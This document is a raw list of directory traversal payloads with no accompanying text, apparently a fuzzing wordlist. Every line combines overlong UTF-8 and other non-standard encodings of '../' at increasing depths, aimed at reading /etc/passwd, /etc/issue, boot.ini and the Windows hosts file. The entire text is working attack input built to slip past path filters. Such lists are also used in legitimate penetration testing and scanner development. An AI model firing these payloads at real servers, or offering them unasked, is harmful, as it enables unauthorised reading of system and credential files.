-%e0%80%ae%e0%80%ae%uEFC8%e0%80%ae%e0%80%ae%uEFC8%e0%80%ae%e0%80%ae%uEFC8%e0%80%ae%e0%80%ae%uEFC8%e0%80%ae%e0%80%ae%uEFC8%e0%80%ae%e0%80%ae%uEFC8etc%uEFC8issue -%e0%80%ae%e0%80%ae%uEFC8%e0%80%ae%e0%80%ae%uEFC8%e0%80%ae%e0%80%ae%uEFC8%e0%80%ae%e0%80%ae%uEFC8%e0%80%ae%e0%80%ae%uEFC8%e0%80%ae%e0%80%ae%uEFC8boot.ini -%e0%80%ae%e0%80%ae%uEFC8%e0%80%ae%e0%80%ae%uEFC8%e0%80%ae%e0%80%ae%uEFC8%e0%80%ae%e0%80%ae%uEFC8%e0%80%ae%e0%80%ae%uEFC8%e0%80%ae%e0%80%ae%uEFC8windows%uEFC8system32%uEFC8drivers%uEFC8etc%uEFC8hosts -%e0%80%ae%e0%80%ae%uF025etc%uF025passwd -%e0%80%ae%e0%80%ae%uF025etc%uF025issue -%e0%80%ae%e0%80%ae%uF025boot.ini -%e0%80%ae%e0%80%ae%uF025windows%uF025system32%uF025drivers%uF025etc%uF025hosts -%e0%80%ae%e0%80%ae%uF025%e0%80%ae%e0%80%ae%uF025etc%uF025passwd -%e0%80%ae%e0%80%ae%uF025%e0%80%ae%e0%80%ae%uF025etc%uF025issue -%e0%80%ae%e0%80%ae%uF025%e0%80%ae%e0%80%ae%uF025boot.ini -%e0%80%ae%e0%80%ae%uF025%e0%80%ae%e0%80%ae%uF025windows%uF025system32%uF025drivers%uF025etc%uF025hosts -%e0%80%ae%e0%80%ae%uF025%e0%80%ae%e0%80%ae%uF025%e0%80%ae%e0%80%ae%uF025etc%uF025passwd -%e0%80%ae%e0%80%ae%uF025%e0%80%ae%e0%80%ae%uF025%e0%80%ae%e0%80%ae%uF025etc%uF025issue -%e0%80%ae%e0%80%ae%uF025%e0%80%ae%e0%80%ae%uF025%e0%80%ae%e0%80%ae%uF025boot.ini -%e0%80%ae%e0%80%ae%uF025%e0%80%ae%e0%80%ae%uF025%e0%80%ae%e0%80%ae%uF025windows%uF025system32%uF025drivers%uF025etc%uF025hosts -%e0%80%ae%e0%80%ae%uF025%e0%80%ae%e0%80%ae%uF025%e0%80%ae%e0%80%ae%uF025%e0%80%ae%e0%80%ae%uF025etc%uF025passwd -%e0%80%ae%e0%80%ae%uF025%e0%80%ae%e0%80%ae%uF025%e0%80%ae%e0%80%ae%uF025%e0%80%ae%e0%80%ae%uF025etc%uF025issue -%e0%80%ae%e0%80%ae%uF025%e0%80%ae%e0%80%ae%uF025%e0%80%ae%e0%80%ae%uF025%e0%80%ae%e0%80%ae%uF025boot.ini -%e0%80%ae%e0%80%ae%uF025%e0%80%ae%e0%80%ae%uF025%e0%80%ae%e0%80%ae%uF025%e0%80%ae%e0%80%ae%uF025windows%uF025system32%uF025drivers%uF025etc%uF025hosts -%e0%80%ae%e0%80%ae%uF025%e0%80%ae%e0%80%ae%uF025%e0%80%ae%e0%80%ae%uF025%e0%80%ae%e0%80%ae%uF025%e0%80%ae%e0%80%ae%uF025etc%uF025passwd -%e0%80%ae%e0%80%ae%uF025%e0%80%ae%e0%80%ae%uF025%e0%80%ae%e0%80%ae%uF025%e0%80%ae%e0%80%ae%uF025%e0%80%ae%e0%80%ae%uF025etc%uF025issue -%e0%80%ae%e0%80%ae%uF025%e0%80%ae%e0%80%ae%uF025%e0%80%ae%e0%80%ae%uF025%e0%80%ae%e0%80%ae%uF025%e0%80%ae%e0%80%ae%uF025boot.ini -%e0%80%ae%e0%80%ae%uF025%e0%80%ae%e0%80%ae%uF025%e0%80%ae%e0%80%ae%uF025%e0%80%ae%e0%80%ae%uF025%e0%80%ae%e0%80%ae%uF025windows%uF025system32%uF025drivers%uF025etc%uF025hosts -%e0%80%ae%e0%80%ae%uF025%e0%80%ae%e0%80%ae%uF025%e0%80%ae%e0%80%ae%uF025%e0%80%ae%e0%80%ae%uF025%e0%80%ae%e0%80%ae%uF025%e0%80%ae%e0%80%ae%uF025etc%uF025passwd -%e0%80%ae%e0%80%ae%uF025%e0%80%ae%e0%80%ae%uF025%e0%80%ae%e0%80%ae%uF025%e0%80%ae%e0%80%ae%uF025%e0%80%ae%e0%80%ae%uF025%e0%80%ae%e0%80%ae%uF025etc%uF025issue -%e0%80%ae%e0%80%ae%uF025%e0%80%ae%e0%80%ae%uF025%e0%80%ae%e0%80%ae%uF025%e0%80%ae%e0%80%ae%uF025%e0%80%ae%e0%80%ae%uF025%e0%80%ae%e0%80%ae%uF025boot.ini -%e0%80%ae%e0%80%ae%uF025%e0%80%ae%e0%80%ae%uF025%e0%80%ae%e0%80%ae%uF025%e0%80%ae%e0%80%ae%uF025%e0%80%ae%e0%80%ae%uF025%e0%80%ae%e0%80%ae%uF025windows%uF025system32%uF025drivers%uF025etc%uF025hosts -%e0%80%ae%e0%80%ae%%32%%66etc%%32%%66passwd -%e0%80%ae%e0%80%ae%%32%%66etc%%32%%66issue -%e0%80%ae%e0%80%ae%%32%%66boot.ini -%e0%80%ae%e0%80%ae%%32%%66windows%%32%%66system32%%32%%66drivers%%32%%66etc%%32%%66hosts -%e0%80%ae%e0%80%ae%%32%%66%e0%80%ae%e0%80%ae%%32%%66etc%%32%%66passwd -%e0%80%ae%e0%80%ae%%32%%66%e0%80%ae%e0%80%ae%%32%%66etc%%32%%66issue -%e0%80%ae%e0%80%ae%%32%%66%e0%80%ae%e0%80%ae%%32%%66boot.ini -%e0%80%ae%e0%80%ae%%32%%66%e0%80%ae%e0%80%ae%%32%%66windows%%32%%66system32%%32%%66drivers%%32%%66etc%%32%%66hosts -%e0%80%ae%e0%80%ae%%32%%66%e0%80%ae%e0%80%ae%%32%%66%e0%80%ae%e0%80%ae%%32%%66etc%%32%%66passwd -%e0%80%ae%e0%80%ae%%32%%66%e0%80%ae%e0%80%ae%%32%%66%e0%80%ae%e0%80%ae%%32%%66etc%%32%%66issue -%e0%80%ae%e0%80%ae%%32%%66%e0%80%ae%e0%80%ae%%32%%66%e0%80%ae%e0%80%ae%%32%%66boot.ini -%e0%80%ae%e0%80%ae%%32%%66%e0%80%ae%e0%80%ae%%32%%66%e0%80%ae%e0%80%ae%%32%%66windows%%32%%66system32%%32%%66drivers%%32%%66etc%%32%%66hosts -%e0%80%ae%e0%80%ae%%32%%66%e0%80%ae%e0%80%ae%%32%%66%e0%80%ae%e0%80%ae%%32%%66%e0%80%ae%e0%80%ae%%32%%66etc%%32%%66passwd -%e0%80%ae%e0%80%ae%%32%%66%e0%80%ae%e0%80%ae%%32%%66%e0%80%ae%e0%80%ae%%32%%66%e0%80%ae%e0%80%ae%%32%%66etc%%32%%66issue -%e0%80%ae%e0%80%ae%%32%%66%e0%80%ae%e0%80%ae%%32%%66%e0%80%ae%e0%80%ae%%32%%66%e0%80%ae%e0%80%ae%%32%%66boot.ini -%e0%80%ae%e0%80%ae%%32%%66%e0%80%ae%e0%80%ae%%32%%66%e0%80%ae%e0%80%ae%%32%%66%e0%80%ae%e0%80%ae%%32%%66windows%%32%%66system32%%32%%66drivers%%32%%66etc%%32%%66hosts -%e0%80%ae%e0%80%ae%%32%%66%e0%80%ae%e0%80%ae%%32%%66%e0%80%ae%e0%80%ae%%32%%66%e0%80%ae%e0%80%ae%%32%%66%e0%80%ae%e0%80%ae%%32%%66etc%%32%%66passwd -%e0%80%ae%e0%80%ae%%32%%66%e0%80%ae%e0%80%ae%%32%%66%e0%80%ae%e0%80%ae%%32%%66%e0%80%ae%e0%80%ae%%32%%66%e0%80%ae%e0%80%ae%%32%%66etc%%32%%66issue -%e0%80%ae%e0%80%ae%%32%%66%e0%80%ae%e0%80%ae%%32%%66%e0%80%ae%e0%80%ae%%32%%66%e0%80%ae%e0%80%ae%%32%%66%e0%80%ae%e0%80%ae%%32%%66boot.ini -%e0%80%ae%e0%80%ae%%32%%66%e0%80%ae%e0%80%ae%%32%%66%e0%80%ae%e0%80%ae%%32%%66%e0%80%ae%e0%80%ae%%32%%66%e0%80%ae%e0%80%ae%%32%%66windows%%32%%66system32%%32%%66drivers%%32%%66etc%%32%%66hosts -%e0%80%ae%e0%80%ae%%32%%66%e0%80%ae%e0%80%ae%%32%%66%e0%80%ae%e0%80%ae%%32%%66%e0%80%ae%e0%80%ae%%32%%66%e0%80%ae%e0%80%ae%%32%%66%e0%80%ae%e0%80%ae%%32%%66etc%%32%%66passwd -%e0%80%ae%e0%80%ae%%32%%66%e0%80%ae%e0%80%ae%%32%%66%e0%80%ae%e0%80%ae%%32%%66%e0%80%ae%e0%80%ae%%32%%66%e0%80%ae%e0%80%ae%%32%%66%e0%80%ae%e0%80%ae%%32%%66etc%%32%%66issue -%e0%80%ae%e0%80%ae%%32%%66%e0%80%ae%e0%80%ae%%32%%66%e0%80%ae%e0%80%ae%%32%%66%e0%80%ae%e0%80%ae%%32%%66%e0%80%ae%e0%80%ae%%32%%66%e0%80%ae%e0%80%ae%%32%%66boot.ini -%e0%80%ae%e0%80%ae%%32%%66%e0%80%ae%e0%80%ae%%32%%66%e0%80%ae%e0%80%ae%%32%%66%e0%80%ae%e0%80%ae%%32%%66%e0%80%ae%e0%80%ae%%32%%66%e0%80%ae%e0%80%ae%%32%%66windows%%32%%66system32%%32%%66drivers%%32%%66etc%%32%%66hosts -%e0%80%ae%e0%80%ae%%35%%63etc%%35%%63passwd -%e0%80%ae%e0%80%ae%%35%%63etc%%35%%63issue -%e0%80%ae%e0%80%ae%%35%%63boot.ini -%e0%80%ae%e0%80%ae%%35%%63windows%%35%%63system32%%35%%63drivers%%35%%63etc%%35%%63hosts -%e0%80%ae%e0%80%ae%%35%%63%e0%80%ae%e0%80%ae%%35%%63etc%%35%%63passwd -%e0%80%ae%e0%80%ae%%35%%63%e0%80%ae%e0%80%ae%%35%%63etc%%35%%63issue -%e0%80%ae%e0%80%ae%%35%%63%e0%80%ae%e0%80%ae%%35%%63boot.ini -%e0%80%ae%e0%80%ae%%35%%63%e0%80%ae%e0%80%ae%%35%%63windows%%35%%63system32%%35%%63drivers%%35%%63etc%%35%%63hosts -%e0%80%ae%e0%80%ae%%35%%63%e0%80%ae%e0%80%ae%%35%%63%e0%80%ae%e0%80%ae%%35%%63etc%%35%%63passwd -%e0%80%ae%e0%80%ae%%35%%63%e0%80%ae%e0%80%ae%%35%%63%e0%80%ae%e0%80%ae%%35%%63etc%%35%%63issue -%e0%80%ae%e0%80%ae%%35%%63%e0%80%ae%e0%80%ae%%35%%63%e0%80%ae%e0%80%ae%%35%%63boot.ini -%e0%80%ae%e0%80%ae%%35%%63%e0%80%ae%e0%80%ae%%35%%63%e0%80%ae%e0%80%ae%%35%%63windows%%35%%63system32%%35%%63drivers%%35%%63etc%%35%%63hosts -%e0%80%ae%e0%80%ae%%35%%63%e0%80%ae%e0%80%ae%%35%%63%e0%80%ae%e0%80%ae%%35%%63%e0%80%ae%e0%80%ae%%35%%63etc%%35%%63passwd -%e0%80%ae%e0%80%ae%%35%%63%e0%80%ae%e0%80%ae%%35%%63%e0%80%ae%e0%80%ae%%35%%63%e0%80%ae%e0%80%ae%%35%%63etc%%35%%63issue -%e0%80%ae%e0%80%ae%%35%%63%e0%80%ae%e0%80%ae%%35%%63%e0%80%ae%e0%80%ae%%35%%63%e0%80%ae%e0%80%ae%%35%%63boot.ini -%e0%80%ae%e0%80%ae%%35%%63%e0%80%ae%e0%80%ae%%35%%63%e0%80%ae%e0%80%ae%%35%%63%e0%80%ae%e0%80%ae%%35%%63windows%%35%%63system32%%35%%63drivers%%35%%63etc%%35%%63hosts -%e0%80%ae%e0%80%ae%%35%%63%e0%80%ae%e0%80%ae%%35%%63%e0%80%ae%e0%80%ae%%35%%63%e0%80%ae%e0%80%ae%%35%%63%e0%80%ae%e0%80%ae%%35%%63etc%%35%%63passwd -%e0%80%ae%e0%80%ae%%35%%63%e0%80%ae%e0%80%ae%%35%%63%e0%80%ae%e0%80%ae%%35%%63%e0%80%ae%e0%80%ae%%35%%63%e0%80%ae%e0%80%ae%%35%%63etc%%35%%63issue -%e0%80%ae%e0%80%ae%%35%%63%e0%80%ae%e0%80%ae%%35%%63%e0%80%ae%e0%80%ae%%35%%63%e0%80%ae%e0%80%ae%%35%%63%e0%80%ae%e0%80%ae%%35%%63boot.ini -%e0%80%ae%e0%80%ae%%35%%63%e0%80%ae%e0%80%ae%%35%%63%e0%80%ae%e0%80%ae%%35%%63%e0%80%ae%e0%80%ae%%35%%63%e0%80%ae%e0%80%ae%%35%%63windows%%35%%63system32%%35%%63drivers%%35%%63etc%%35%%63hosts -%e0%80%ae%e0%80%ae%%35%%63%e0%80%ae%e0%80%ae%%35%%63%e0%80%ae%e0%80%ae%%35%%63%e0%80%ae%e0%80%ae%%35%%63%e0%80%ae%e0%80%ae%%35%%63%e0%80%ae%e0%80%ae%%35%%63etc%%35%%63passwd -%e0%80%ae%e0%80%ae%%35%%63%e0%80%ae%e0%80%ae%%35%%63%e0%80%ae%e0%80%ae%%35%%63%e0%80%ae%e0%80%ae%%35%%63%e0%80%ae%e0%80%ae%%35%%63%e0%80%ae%e0%80%ae%%35%%63etc%%35%%63issue -%e0%80%ae%e0%80%ae%%35%%63%e0%80%ae%e0%80%ae%%35%%63%e0%80%ae%e0%80%ae%%35%%63%e0%80%ae%e0%80%ae%%35%%63%e0%80%ae%e0%80%ae%%35%%63%e0%80%ae%e0%80%ae%%35%%63boot.ini -%e0%80%ae%e0%80%ae%%35%%63%e0%80%ae%e0%80%ae%%35%%63%e0%80%ae%e0%80%ae%%35%%63%e0%80%ae%e0%80%ae%%35%%63%e0%80%ae%e0%80%ae%%35%%63%e0%80%ae%e0%80%ae%%35%%63windows%%35%%63system32%%35%%63drivers%%35%%63etc%%35%%63hosts -%e0%80%ae%e0%80%ae%e0%80%afetc%e0%80%afpasswd -%e0%80%ae%e0%80%ae%e0%80%afetc%e0%80%afissue -%e0%80%ae%e0%80%ae%e0%80%afboot.ini -%e0%80%ae%e0%80%ae%e0%80%afwindows%e0%80%afsystem32%e0%80%afdrivers%e0%80%afetc%e0%80%afhosts -%e0%80%ae%e0%80%ae%e0%80%af%e0%80%ae%e0%80%ae%e0%80%afetc%e0%80%afpasswd -%e0%80%ae%e0%80%ae%e0%80%af%e0%80%ae%e0%80%ae%e0%80%afetc%e0%80%afissue -%e0%80%ae%e0%80%ae%e0%80%af%e0%80%ae%e0%80%ae%e0%80%afboot.ini -%e0%80%ae%e0%80%ae%e0%80%af%e0%80%ae%e0%80%ae%e0%80%afwindows%e0%80%afsystem32%e0%80%afdrivers%e0%80%afetc%e0%80%afhosts -%e0%80%ae%e0%80%ae%e0%80%af%e0%80%ae%e0%80%ae%e0%80%af%e0%80%ae%e0%80%ae%e0%80%afetc%e0%80%afpasswd -%e0%80%ae%e0%80%ae%e0%80%af%e0%80%ae%e0%80%ae%e0%80%af%e0%80%ae%e0%80%ae%e0%80%afetc%e0%80%afissue -%e0%80%ae%e0%80%ae%e0%80%af%e0%80%ae%e0%80%ae%e0%80%af%e0%80%ae%e0%80%ae%e0%80%afboot.ini -%e0%80%ae%e0%80%ae%e0%80%af%e0%80%ae%e0%80%ae%e0%80%af%e0%80%ae%e0%80%ae%e0%80%afwindows%e0%80%afsystem32%e0%80%afdrivers%e0%80%afetc%e0%80%afhosts -%e0%80%ae%e0%80%ae%e0%80%af%e0%80%ae%e0%80%ae%e0%80%af%e0%80%ae%e0%80%ae%e0%80%af%e0%80%ae%e0%80%ae%e0%80%afetc%e0%80%afpasswd -%e0%80%ae%e0%80%ae%e0%80%af%e0%80%ae%e0%80%ae%e0%80%af%e0%80%ae%e0%80%ae%e0%80%af%e0%80%ae%e0%80%ae%e0%80%afetc%e0%80%afissue -%e0%80%ae%e0%80%ae%e0%80%af%e0%80%ae%e0%80%ae%e0%80%af%e0%80%ae%e0%80%ae%e0%80%af%e0%80%ae%e0%80%ae%e0%80%afboot.ini -%e0%80%ae%e0%80%ae%e0%80%af%e0%80%ae%e0%80%ae%e0%80%af%e0%80%ae%e0%80%ae%e0%80%af%e0%80%ae%e0%80%ae%e0%80%afwindows%e0%80%afsystem32%e0%80%afdrivers%e0%80%afetc%e0%80%afhosts -%e0%80%ae%e0%80%ae%e0%80%af%e0%80%ae%e0%80%ae%e0%80%af%e0%80%ae%e0%80%ae%e0%80%af%e0%80%ae%e0%80%ae%e0%80%af%e0%80%ae%e0%80%ae%e0%80%afetc%e0%80%afpasswd -%e0%80%ae%e0%80%ae%e0%80%af%e0%80%ae%e0%80%ae%e0%80%af%e0%80%ae%e0%80%ae%e0%80%af%e0%80%ae%e0%80%ae%e0%80%af%e0%80%ae%e0%80%ae%e0%80%afetc%e0%80%afissue -%e0%80%ae%e0%80%ae%e0%80%af%e0%80%ae%e0%80%ae%e0%80%af%e0%80%ae%e0%80%ae%e0%80%af%e0%80%ae%e0%80%ae%e0%80%af%e0%80%ae%e0%80%ae%e0%80%afboot.ini -%e0%80%ae%e0%80%ae%e0%80%af%e0%80%ae%e0%80%ae%e0%80%af%e0%80%ae%e0%80%ae%e0%80%af%e0%80%ae%e0%80%ae%e0%80%af%e0%80%ae%e0%80%ae%e0%80%afwindows%e0%80%afsystem32%e0%80%afdrivers%e0%80%afetc%e0%80%afhosts -%e0%80%ae%e0%80%ae%e0%80%af%e0%80%ae%e0%80%ae%e0%80%af%e0%80%ae%e0%80%ae%e0%80%af%e0%80%ae%e0%80%ae%e0%80%af%e0%80%ae%e0%80%ae%e0%80%af%e0%80%ae%e0%80%ae%e0%80%afetc%e0%80%afpasswd -%e0%80%ae%e0%80%ae%e0%80%af%e0%80%ae%e0%80%ae%e0%80%af%e0%80%ae%e0%80%ae%e0%80%af%e0%80%ae%e0%80%ae%e0%80%af%e0%80%ae%e0%80%ae%e0%80%af%e0%80%ae%e0%80%ae%e0%80%afetc%e0%80%afissue -%e0%80%ae%e0%80%ae%e0%80%af%e0%80%ae%e0%80%ae%e0%80%af%e0%80%ae%e0%80%ae%e0%80%af%e0%80%ae%e0%80%ae%e0%80%af%e0%80%ae%e0%80%ae%e0%80%af%e0%80%ae%e0%80%ae%e0%80%afboot.ini -%e0%80%ae%e0%80%ae%e0%80%af%e0%80%ae%e0%80%ae%e0%80%af%e0%80%ae%e0%80%ae%e0%80%af%e0%80%ae%e0%80%ae%e0%80%af%e0%80%ae%e0%80%ae%e0%80%af%e0%80%ae%e0%80%ae%e0%80%afwindows%e0%80%afsystem32%e0%80%afdrivers%e0%80%afetc%e0%80%afhosts -%e0%80%ae%e0%80%ae%25c1%259cetc%25c1%259cpasswd -%e0%80%ae%e0%80%ae%25c1%259cetc%25c1%259cissue -%e0%80%ae%e0%80%ae%25c1%259cboot.ini -%e0%80%ae%e0%80%ae%25c1%259cwindows%25c1%259csystem32%25c1%259cdrivers%25c1%259cetc%25c1%259chosts -%e0%80%ae%e0%80%ae%25c1%259c%e0%80%ae%e0%80%ae%25c1%259cetc%25c1%259cpasswd -%e0%80%ae%e0%80%ae%25c1%259c%e0%80%ae%e0%80%ae%25c1%259cetc%25c1%259cissue -%e0%80%ae%e0%80%ae%25c1%259c%e0%80%ae%e0%80%ae%25c1%259cboot.ini -%e0%80%ae%e0%80%ae%25c1%259c%e0%80%ae%e0%80%ae%25c1%259cwindows%25c1%259csystem32%25c1%259cdrivers%25c1%259cetc%25c1%259chosts -%e0%80%ae%e0%80%ae%25c1%259c%e0%80%ae%e0%80%ae%25c1%259c%e0%80%ae%e0%80%ae%25c1%259cetc%25c1%259cpasswd -%e0%80%ae%e0%80%ae%25c1%259c%e0%80%ae%e0%80%ae%25c1%259c%e0%80%ae%e0%80%ae%25c1%259cetc%25c1%259cissue -%e0%80%ae%e0%80%ae%25c1%259c%e0%80%ae%e0%80%ae%25c1%259c%e0%80%ae%e0%80%ae%25c1%259cboot.ini -%e0%80%ae%e0%80%ae%25c1%259c%e0%80%ae%e0%80%ae%25c1%259c%e0%80%ae%e0%80%ae%25c1%259cwindows%25c1%259csystem32%25c1%259cdrivers%25c1%259cetc%25c1%259chosts -%e0%80%ae%e0%80%ae%25c1%259c%e0%80%ae%e0%80%ae%25c1%259c%e0%80%ae%e0%80%ae%25c1%259c%e0%80%ae%e0%80%ae%25c1%259cetc%25c1%259cpasswd -%e0%80%ae%e0%80%ae%25c1%259c%e0%80%ae%e0%80%ae%25c1%259c%e0%80%ae%e0%80%ae%25c1%259c%e0%80%ae%e0%80%ae%25c1%259cetc%25c1%259cissue -%e0%80%ae%e0%80%ae%25c1%259c%e0%80%ae%e0%80%ae%25c1%259c%e0%80%ae%e0%80%ae%25c1%259c%e0%80%ae%e0%80%ae%25c1%259cboot.ini -%e0%80%ae%e0%80%ae%25c1%259c%e0%80%ae%e0%80%ae%25c1%259c%e0%80%ae%e0%80%ae%25c1%259c%e0%80%ae%e0%80%ae%25c1%259cwindows%25c1%259csystem32%25c1%259cdrivers%25c1%259cetc%25c1%259chosts -%e0%80%ae%e0%80%ae%25c1%259c%e0%80%ae%e0%80%ae%25c1%259c%e0%80%ae%e0%80%ae%25c1%259c%e0%80%ae%e0%80%ae%25c1%259c%e0%80%ae%e0%80%ae%25c1%259cetc%25c1%259cpasswd -%e0%80%ae%e0%80%ae%25c1%259c%e0%80%ae%e0%80%ae%25c1%259c%e0%80%ae%e0%80%ae%25c1%259c%e0%80%ae%e0%80%ae%25c1%259c%e0%80%ae%e0%80%ae%25c1%259cetc%25c1%259cissue -%e0%80%ae%e0%80%ae%25c1%259c%e0%80%ae%e0%80%ae%25c1%259c%e0%80%ae%e0%80%ae%25c1%259c%e0%80%ae%e0%80%ae%25c1%259c%e0%80%ae%e0%80%ae%25c1%259cboot.ini -%e0%80%ae%e0%80%ae%25c1%259c%e0%80%ae%e0%80%ae%25c1%259c%e0%80%ae%e0%80%ae%25c1%259c%e0%80%ae%e0%80%ae%25c1%259c%e0%80%ae%e0%80%ae%25c1%259cwindows%25c1%259csystem32%25c1%259cdrivers%25c1%259cetc%25c1%259chosts -%e0%80%ae%e0%80%ae%25c1%259c%e0%80%ae%e0%80%ae%25c1%259c%e0%80%ae%e0%80%ae%25c1%259c%e0%80%ae%e0%80%ae%25c1%259c%e0%80%ae%e0%80%ae%25c1%259c%e0%80%ae%e0%80%ae%25c1%259cetc%25c1%259cpasswd -%e0%80%ae%e0%80%ae%25c1%259c%e0%80%ae%e0%80%ae%25c1%259c%e0%80%ae%e0%80%ae%25c1%259c%e0%80%ae%e0%80%ae%25c1%259c%e0%80%ae%e0%80%ae%25c1%259c%e0%80%ae%e0%80%ae%25c1%259cetc%25c1%259cissue -%e0%80%ae%e0%80%ae%25c1%259c%e0%80%ae%e0%80%ae%25c1%259c%e0%80%ae%e0%80%ae%25c1%259c%e0%80%ae%e0%80%ae%25c1%259c%e0%80%ae%e0%80%ae%25c1%259c%e0%80%ae%e0%80%ae%25c1%259cboot.ini -%e0%80%ae%e0%80%ae%25c1%259c%e0%80%ae%e0%80%ae%25c1%259c%e0%80%ae%e0%80%ae%25c1%259c%e0%80%ae%e0%80%ae%25c1%259c%e0%80%ae%e0%80%ae%25c1%259c%e0%80%ae%e0%80%ae%25c1%259cwindows%25c1%259csystem32%25c1%259cdrivers%25c1%259cetc%25c1%259chosts -%e0%80%ae%e0%80%ae%25c0%25afetc%25c0%25afpasswd -%e0%80%ae%e0%80%ae%25c0%25afetc%25c0%25afissue -%e0%80%ae%e0%80%ae%25c0%25afboot.ini -%e0%80%ae%e0%80%ae%25c0%25afwindows%25c0%25afsystem32%25c0%25afdrivers%25c0%25afetc%25c0%25afhosts -%e0%80%ae%e0%80%ae%25c0%25af%e0%80%ae%e0%80%ae%25c0%25afetc%25c0%25afpasswd -%e0%80%ae%e0%80%ae%25c0%25af%e0%80%ae%e0%80%ae%25c0%25afetc%25c0%25afissue -%e0%80%ae%e0%80%ae%25c0%25af%e0%80%ae%e0%80%ae%25c0%25afboot.ini -%e0%80%ae%e0%80%ae%25c0%25af%e0%80%ae%e0%80%ae%25c0%25afwindows%25c0%25afsystem32%25c0%25afdrivers%25c0%25afetc%25c0%25afhosts -%e0%80%ae%e0%80%ae%25c0%25af%e0%80%ae%e0%80%ae%25c0%25af%e0%80%ae%e0%80%ae%25c0%25afetc%25c0%25afpasswd -%e0%80%ae%e0%80%ae%25c0%25af%e0%80%ae%e0%80%ae%25c0%25af%e0%80%ae%e0%80%ae%25c0%25afetc%25c0%25afissue -%e0%80%ae%e0%80%ae%25c0%25af%e0%80%ae%e0%80%ae%25c0%25af%e0%80%ae%e0%80%ae%25c0%25afboot.ini -%e0%80%ae%e0%80%ae%25c0%25af%e0%80%ae%e0%80%ae%25c0%25af%e0%80%ae%e0%80%ae%25c0%25afwindows%25c0%25afsystem32%25c0%25afdrivers%25c0%25afetc%25c0%25afhosts -%e0%80%ae%e0%80%ae%25c0%25af%e0%80%ae%e0%80%ae%25c0%25af%e0%80%ae%e0%80%ae%25c0%25af%e0%80%ae%e0%80%ae%25c0%25afetc%25c0%25afpasswd -%e0%80%ae%e0%80%ae%25c0%25af%e0%80%ae%e0%80%ae%25c0%25af%e0%80%ae%e0%80%ae%25c0%25af%e0%80%ae%e0%80%ae%25c0%25afetc%25c0%25afissue -%e0%80%ae%e0%80%ae%25c0%25af%e0%80%ae%e0%80%ae%25c0%25af%e0%80%ae%e0%80%ae%25c0%25af%e0%80%ae%e0%80%ae%25c0%25afboot.ini -%e0%80%ae%e0%80%ae%25c0%25af%e0%80%ae%e0%80%ae%25c0%25af%e0%80%ae%e0%80%ae%25c0%25af%e0%80%ae%e0%80%ae%25c0%25afwindows%25c0%25afsystem32%25c0%25afdrivers%25c0%25afetc%25c0%25afhosts -%e0%80%ae%e0%80%ae%25c0%25af%e0%80%ae%e0%80%ae%25c0%25af%e0%80%ae%e0%80%ae%25c0%25af%e0%80%ae%e0%80%ae%25c0%25af%e0%80%ae%e0%80%ae%25c0%25afetc%25c0%25afpasswd -%e0%80%ae%e0%80%ae%25c0%25af%e0%80%ae%e0%80%ae%25c0%25af%e0%80%ae%e0%80%ae%25c0%25af%e0%80%ae%e0%80%ae%25c0%25af%e0%80%ae%e0%80%ae%25c0%25afetc%25c0%25afissue -%e0%80%ae%e0%80%ae%25c0%25af%e0%80%ae%e0%80%ae%25c0%25af%e0%80%ae%e0%80%ae%25c0%25af%e0%80%ae%e0%80%ae%25c0%25af%e0%80%ae%e0%80%ae%25c0%25afboot.ini -%e0%80%ae%e0%80%ae%25c0%25af%e0%80%ae%e0%80%ae%25c0%25af%e0%80%ae%e0%80%ae%25c0%25af%e0%80%ae%e0%80%ae%25c0%25af%e0%80%ae%e0%80%ae%25c0%25afwindows%25c0%25afsystem32%25c0%25afdrivers%25c0%25afetc%25c0%25afhosts -%e0%80%ae%e0%80%ae%25c0%25af%e0%80%ae%e0%80%ae%25c0%25af%e0%80%ae%e0%80%ae%25c0%25af%e0%80%ae%e0%80%ae%25c0%25af%e0%80%ae%e0%80%ae%25c0%25af%e0%80%ae%e0%80%ae%25c0%25afetc%25c0%25afpasswd -%e0%80%ae%e0%80%ae%25c0%25af%e0%80%ae%e0%80%ae%25c0%25af%e0%80%ae%e0%80%ae%25c0%25af%e0%80%ae%e0%80%ae%25c0%25af%e0%80%ae%e0%80%ae%25c0%25af%e0%80%ae%e0%80%ae%25c0%25afetc%25c0%25afissue -%e0%80%ae%e0%80%ae%25c0%25af%e0%80%ae%e0%80%ae%25c0%25af%e0%80%ae%e0%80%ae%25c0%25af%e0%80%ae%e0%80%ae%25c0%25af%e0%80%ae%e0%80%ae%25c0%25af%e0%80%ae%e0%80%ae%25c0%25afboot.ini -%e0%80%ae%e0%80%ae%25c0%25af%e0%80%ae%e0%80%ae%25c0%25af%e0%80%ae%e0%80%ae%25c0%25af%e0%80%ae%e0%80%ae%25c0%25af%e0%80%ae%e0%80%ae%25c0%25af%e0%80%ae%e0%80%ae%25c0%25afwindows%25c0%25afsystem32%25c0%25afdrivers%25c0%25afetc%25c0%25afhosts -%e0%80%ae%e0%80%ae%f0%80%80%afetc%f0%80%80%afpasswd -%e0%80%ae%e0%80%ae%f0%80%80%afetc%f0%80%80%afissue -%e0%80%ae%e0%80%ae%f0%80%80%afboot.ini -%e0%80%ae%e0%80%ae%f0%80%80%afwindows%f0%80%80%afsystem32%f0%80%80%afdrivers%f0%80%80%afetc%f0%80%80%afhosts -%e0%80%ae%e0%80%ae%f0%80%80%af%e0%80%ae%e0%80%ae%f0%80%80%afetc%f0%80%80%afpasswd -%e0%80%ae%e0%80%ae%f0%80%80%af%e0%80%ae%e0%80%ae%f0%80%80%afetc%f0%80%80%afissue -%e0%80%ae%e0%80%ae%f0%80%80%af%e0%80%ae%e0%80%ae%f0%80%80%afboot.ini -%e0%80%ae%e0%80%ae%f0%80%80%af%e0%80%ae%e0%80%ae%f0%80%80%afwindows%f0%80%80%afsystem32%f0%80%80%afdrivers%f0%80%80%afetc%f0%80%80%afhosts -%e0%80%ae%e0%80%ae%f0%80%80%af%e0%80%ae%e0%80%ae%f0%80%80%af%e0%80%ae%e0%80%ae%f0%80%80%afetc%f0%80%80%afpasswd -%e0%80%ae%e0%80%ae%f0%80%80%af%e0%80%ae%e0%80%ae%f0%80%80%af%e0%80%ae%e0%80%ae%f0%80%80%afetc%f0%80%80%afissue -%e0%80%ae%e0%80%ae%f0%80%80%af%e0%80%ae%e0%80%ae%f0%80%80%af%e0%80%ae%e0%80%ae%f0%80%80%afboot.ini -%e0%80%ae%e0%80%ae%f0%80%80%af%e0%80%ae%e0%80%ae%f0%80%80%af%e0%80%ae%e0%80%ae%f0%80%80%afwindows%f0%80%80%afsystem32%f0%80%80%afdrivers%f0%80%80%afetc%f0%80%80%afhosts 